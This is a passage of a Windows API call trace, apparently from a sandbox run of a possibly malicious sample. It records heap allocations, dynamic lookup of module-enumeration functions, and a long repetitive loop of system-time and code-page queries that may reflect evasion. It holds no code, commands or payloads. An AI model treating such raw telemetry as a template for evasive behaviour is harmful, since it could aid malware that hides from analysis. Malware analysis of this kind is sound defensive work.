Flags=0x8, Size=0x24) returned 0x381ef0 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x29) returned 0x381f20 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1e) returned 0x381f58 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x41) returned 0x381f80 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x17) returned 0x381fd0 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xf) returned 0x381ff0 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x16) returned 0x382008 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x2a) returned 0x382028 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x29) returned 0x382060 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x15) returned 0x382098 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1e) returned 0x3820b8 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x2a) returned 0x3820e0 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x12) returned 0x382118 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x18) returned 0x382138 [0164.236] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x46) returned 0x382158 [0164.236] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x3811f8 | out: hHeap=0x380000) returned 1 [0164.237] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x800) returned 0x3821a8 [0164.237] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x80) returned 0x3811f8 [0164.237] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0164.238] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x3811f8) returned 0x80 [0164.238] GetLastError () returned 0x0 [0164.238] SetLastError (dwErrCode=0x0) [0164.238] GetLastError () returned 0x0 [0164.238] SetLastError (dwErrCode=0x0) [0164.238] GetLastError () returned 0x0 [0164.238] SetLastError (dwErrCode=0x0) [0164.238] GetLastError () returned 0x0 [0164.238] SetLastError (dwErrCode=0x0) [0164.238] GetLastError () returned 0x0 [0164.238] SetLastError (dwErrCode=0x0) [0164.238] GetLastError () returned 0x0 [0164.238] SetLastError (dwErrCode=0x0) [0164.238] GetLastError () returned 0x0 [0164.238] SetLastError (dwErrCode=0x0) [0164.238] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.239] SetLastError (dwErrCode=0x0) [0164.239] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.240] SetLastError (dwErrCode=0x0) [0164.240] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] SetLastError (dwErrCode=0x0) [0164.241] GetLastError () returned 0x0 [0164.241] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0164.242] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0164.242] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0164.242] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0164.244] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0164.244] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0164.244] GetTickCount () returned 0x11588d0 [0164.244] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.244] GetACP () returned 0x4e4 [0164.244] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.244] GetACP () returned 0x4e4 [0164.244] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.245] GetACP () returned 0x4e4 [0164.245] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.246] GetACP () returned 0x4e4 [0164.246] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.247] GetACP () returned 0x4e4 [0164.247] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.247] GetACP () returned 0x4e4 [0164.247] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.247] GetACP () returned 0x4e4 [0164.247] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.247] GetACP () returned 0x4e4 [0164.247] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.247] GetACP () returned 0x4e4 [0164.247] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.247] GetACP () returned 0x4e4 [0164.247] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.247] GetACP () returned 0x4e4 [0164.247] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.248] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.248] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.248] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.248] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.248] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.248] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.248] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.248] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.249] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.249] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.249] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.249] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.249] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.249] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.249] GetACP () returned 0x4e4 [0164.249] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.250] GetACP () returned 0x4e4 [0164.250] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.251] GetACP () returned 0x4e4 [0164.251] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.252] GetACP () returned 0x4e4 [0164.252] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.252] GetCPInfo (in: CodePage=0x0, 